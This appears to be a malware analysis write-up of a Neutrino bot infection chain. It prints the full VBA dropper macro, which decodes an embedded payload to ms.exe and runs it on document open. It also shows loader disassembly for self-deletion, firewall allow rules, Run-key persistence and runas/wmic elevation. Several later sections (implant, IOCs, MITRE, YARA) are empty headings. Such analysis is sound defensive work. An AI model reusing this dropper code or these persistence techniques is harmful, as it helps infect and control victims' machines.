# Neutrino physics 101 ## Table of Contents * [Malware analysis](#Malware-analysis) + [The initial vector](#Initial) + [Loader](#loader) + [Final Implant](#Final) * [Cyber kill chain](#Cyber-kill-chain) * [Indicators Of Compromise (IOC)](#IOC) * [Yara Rules](#Yara) * [References MITRE ATT&CK Matrix](#Ref-MITRE-ATTACK) * [Links](#Links) + [Original Tweet](#tweet) + [Link Anyrun](#Links-Anyrun) + [Ressources](#Ressources)

Malware analysis

The initial vector

The initial vector is an malicious document using a macro. As the first look, we can note some constant variables can be replace and deletefor improvement the reading of the code.
We can see the both functions for auto-open the macro in the reading of the document for the Word and Excel document. This is for a common code for the both vectors or for reduce the rate of the detection, hard to say it.
``` VBA Sub AutoOpen() AddSpace End Sub Private Sub Workbook_Open() AddSpace End Sub ```
This used an intermediate function for execute the main function.
``` VBA Sub AddSpace() RemoveParagraph End Sub ```
The first two functions used by the macro are for encoded and decode in base 64 in using multiples interations of the data.
``` VBA Public Function Encode64(sString As String) As String Dim bTrans(63) As Byte, OOOPOOOOPOOOO8(255) As Long, OOOPOOOOPOOOO16(255) As Long, bOut() As Byte, bIn() As Byte Dim var_B As Long, lTrip As Long, iPad As Integer, lLen As Long, i As Long, var_A As Long, lOutSize As Long For i = 0 To 63 Select Case i Case 0 To 25 bTrans(i) = 65 + i Case 26 To 51 bTrans(i) = 71 + i Case 52 To 61 bTrans(i) = i - 4 Case 62 bTrans(i) = 43 Case 63 bTrans(i) = 47 End Select Next i For i = 0 To 255 OOOPOOOOPOOOO8(i) = i * 256 OOOPOOOOPOOOO16(i) = i * 65536 Next i iPad = Len(sString) Mod 3 If iPad Then iPad = 3 - iPad sString = sString & String(iPad, Chr(0)) End If bIn = StrConv(sString, vbFromUnicode) lLen = ((UBound(bIn) + 1) \ 3) * 4 i = lLen \ 72 lOutSize = ((i * 2) + lLen) - 1 ReDim bOut(lOutSize) lLen = 0 For var_B = LBound(bIn) To UBound(bIn) Step 3 lTrip = OOOPOOOOPOOOO16(bIn(var_B)) + OOOPOOOOPOOOO8(bIn(var_B + 1)) + bIn(var_B + 2) i = lTrip And 16515072 bOut(var_A) = bTrans(i \ 262144) i = lTrip And 258048 bOut(var_A + 1) = bTrans(i \ 4096) i = lTrip And 4032 bOut(var_A + 2) = bTrans(i \ 64) bOut(var_A + 3) = bTrans(lTrip And 63) If lLen = 68 Then bOut(var_A + 4) = 13 bOut(var_A + 5) = 10 lLen = 0 var_A = var_A + 6 Else lLen = lLen + 4 var_A = var_A + 4 End If Next var_B If bOut(lOutSize) = 10 Then lOutSize = lOutSize - 2 If iPad = 1 Then bOut(lOutSize) = 61 ElseIf iPad = 2 Then bOut(lOutSize) = 61 bOut(lOutSize - 1) = 61 End If Encode64 = StrConv(bOut, vbUnicode) End Function Public Function Decrypt(sString As String) As String Dim bOut() As Byte, bIn() As Byte, bTrans(255) As Byte, OOOPOOOOPOOOO6(63) As Long, OOOPOOOOPOOOO12(63) As Long Dim OOOPOOOOPOOOO18(63) As Long, lQuad As Long, iPad As Integer, var_B As Long, var_A As Long, sOut As String Dim i As Long sString = Replace(sString, vbCr, vbNullString) sString = Replace(sString, vbLf, vbNullString) i = Len(sString) Mod 4 If InStrRev(sString, "==") Then iPad = 2 ElseIf InStrRev(sString, "=") Then iPad = 1 End If For i = 0 To 255 Select Case i Case 65 To 90 bTrans(i) = i - 65 Case 97 To 122 bTrans(i) = i - 71 Case 48 To 57 bTrans(i) = i + 4 Case 43 bTrans(i) = 62 Case 47 bTrans(i) = 63 End Select Next i For i = 0 To 63 OOOPOOOOPOOOO6(i) = i * 64 OOOPOOOOPOOOO12(i) = i * 4096 OOOPOOOOPOOOO18(i) = i * 262144 Next i bIn = StrConv(sString, vbFromUnicode) ReDim bOut((((UBound(bIn) + 1) \ 4) * 3) - 1) For var_B = 0 To UBound(bIn) Step 4 lQuad = OOOPOOOOPOOOO18(bTrans(bIn(var_B))) + OOOPOOOOPOOOO12(bTrans(bIn(var_B + 1))) + OOOPOOOOPOOOO6(bTrans(bIn(var_B + 2))) + bTrans(bIn(var_B + 3)) i = lQuad And 16711680 bOut(var_A) = i \ 65536 i = lQuad And 65280 bOut(var_A + 1) = i \ 256 bOut(var_A + 2) = lQuad And 255 var_A = var_A + 3 Next var_B sOut = StrConv(bOut, vbUnicode) If iPad Then sOut = Left$(sOut, Len(sOut) - iPad) Decrypt = sOut End Function ```
The next function is for delete the existing content.
``` VBA Public Sub Wipedir(path As String) Dim ScriptingObj Set ScriptingObj = CreateObject("Scripting.FileSystemObject") If ScriptingObj.folderexists(path) Then ScriptingObj.deletefolder path Else End End If End Sub ```
The last functions are the main function and that allow to execute the macro. This xor the content of the data by 76 (0x4C), write in on the all users location and execute the loader.
``` VBA Sub RemoveParagraph() Dim j As Integer Dim Name_Payload As String Dim Path As String Dim FreeFileSlot As Integer Dim para As Paragraph Dim i As Long Dim data_para As String Dim Byte_payload As Byte Dim Unknown_Ref As String Unknown_Ref = "Startincex" Path = Environ("ALLUSERSPROFILE") + "\Memsys" If Len(dir(Path, vbDirectory)) = 0 Then MkDir (Decrypt(Encode64(Path))) Else: Wipedir (Path) MkDir (Decrypt(Encode64(Path))) End If Name_Payload = "ms.exe" ChDrive (Path) ChDir (Decrypt(Encode64(Path))) FreeFileSlot = FreeFile() Open Name_Payload For Binary As FreeFileSlot j = 0 For Each para In ActiveDocument.Paragraphs DoEvents data_para = para.Range.Text i = 1 j = j + 1 If j >= 24 Then While (i < Len(data_para)) Byte_payload = "&H" & Mid(data_para, i, 2) Byte_payload = Byte_payload Xor &H4C ' Xor 76 Put #FreeFileSlot, , Byte_payload i = i + 2 Wend End If Next Close #FreeFileSlot Exec (Name_Payload) End Sub Sub Exec(Name_Payload0 As String) Dim Path As String Dim OBsGG Path = Environ("ALLUSERSPROFILE") + "\Memsys" ChDrive (Path) ChDir (Decrypt(Encode64(Path))) OBsGG = Shell((Path + "\ms.exe"), 1) End Sub ```

The loader

After loaded in memory, this delete himself by a concated command with a ping command
```winbatch cmd.exe /a /c ping -n 3&del "%PROGRAMFILES(X86)%\Memsys\ms.exe" ```
The loader creates a mutex with a name that is hardcoded in the binary:"Z0BAZwxx" ,we can note too that the loader add two rules in the firewall on the victim.
```asm 0x00404e3e jb 0x404e4d 0x00404e40 push eax 0x00404e41 push str.Z0BAZwxx ; 0x407098 ; u"Z0BAZwxx" 0x00404e46 push str.netsh_advfirewall_firewall_add_rule_name___s__dir_in_action_allow_program___s ; 0x407138 ; u"netsh advfirewall firewall add rule name=\"%s\" dir=in action=allow program=\"%s\"" 0x00404e4b jmp 0x404e58 0x00404e4d push str.Z0BAZwxx ; 0x407098 ; u"Z0BAZwxx" 0x00404e52 push eax 0x00404e53 push str.netsh_firewall_add_allowedprogram___s___s_ENABLE ; 0x4070d0 ; u"netsh firewall add allowedprogram \"%s\" %s ENABLE" 0x00404e58 push esi 0x00404e59 call ebx 0x00404e5b add esp, 0x10 0x00404e5e push esi ```
This push a run key for the persistence for the implant :
```winbatch Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Name: [a-z]{5}_32.exe/[a-z]{5}.exe [x86/x64]
Path: C:\Users\admin\AppData\Roaming\Z0BAZwxx\{Filename} ```
The name of the mutex is also used for the name of folder in Appdata.
The loader use a xor for get the final implant.
```asm 0x004066db xor word [eax], 0xff ; 255 0x004066e0 add eax, 2 0x004066e3 cmp word [eax], 0 0x004066e7 jne 0x4066db ```
Once the data extracted, this create a new process if rights is high, this use runas by wmi call instead it
```asm 0x00405e2e push str.ComSpec ; 0x4070ac ; u"ComSpec" 0x00405e33 call eax 0x00405e5a push str.a__c__s ; 0x4070bc ; u" /a /c %s" 0x00405e5f push esi 0x00405e60 call dword [ebp - 0x28] 0x00405e63 push 0x3c7bf3ff 0x00405e68 push ebx 0x00405eef push str.process_call_create__s ; 0x4071f8 ; u"process call create %s" 0x00405ef4 push eax 0x00405ef5 call esi 0x00405ef7 add esp, 0x10 0x00405efa test eax, eax 0x00405f18 push 0xb289d372 0x00405f1d push 8 ; 8 0x00405f1f mov dword [ebp - 0x44], 0x3c ; '<' ; 60 0x00405f26 mov dword [ebp - 0x38], str.runas ; 0x407228 ; u"runas" 0x00405f2d mov dword [ebp - 0x34], str.wmic ; 0x407234 ; u"wmic" 0x00405f34 mov dword [ebp - 0x30], eax ```

Final Implant

The implant use multiples method for anti-VM and sandbox :
The list of the IP to contact are hardcoded in base64.
This can perform the following actions :

Cyber kill chain

The process graph resume cyber kill chains used by the attacker :

Indicators Of Compromise (IOC)

List of all the Indicators Of Compromise (IOC)
|Indicator|Description| | ------------- |:-------------:|
The IOC can be exported in JSON

References MITRE ATT&CK Matrix

|Enterprise tactics|Technics used|Ref URL| | :---------------: |:-------------| :------------- |
This can be exported as JSON format

Yara Rules

YARA Rules are available here


Original tweet:
* [https://twitter.com/JAMESWT_MHT/status/1225796259845414912](https://twitter.com/JAMESWT_MHT/status/1225796259845414912)
Links Anyrun:
* [impor.doc](https://app.any.run/tasks/454fe6a2-e2d0-4fa3-ba1d-78e2c7372ddd)
Resources :
* [Encode64 / Decode64 in VB.NET](https://stackoverflow.com/questions/12879661/encode64-decode64-in-vb-net) * [New Neutrino Bot comes in a protective loader](https://blog.malwarebytes.com/threat-analysis/2017/02/new-neutrino-bot-comes-in-a-protective-loader/) * [Checksum calculator (from NeutrinoBot Loader)](https://gist.github.com/hasherezade/aefabdb9a67193ef05c93228a78c20c6#file-checksum-cpp) * [URLhaus Neutrino](https://urlhaus.abuse.ch/browse/tag/Neutrino/) * [VB2019 paper: Rich Headers: leveraging this mysterious artifact of the PE format](https://www.virusbulletin.com/virusbulletin/2020/01/vb2019-paper-rich-headers-leveraging-mysterious-artifact-pe-format/)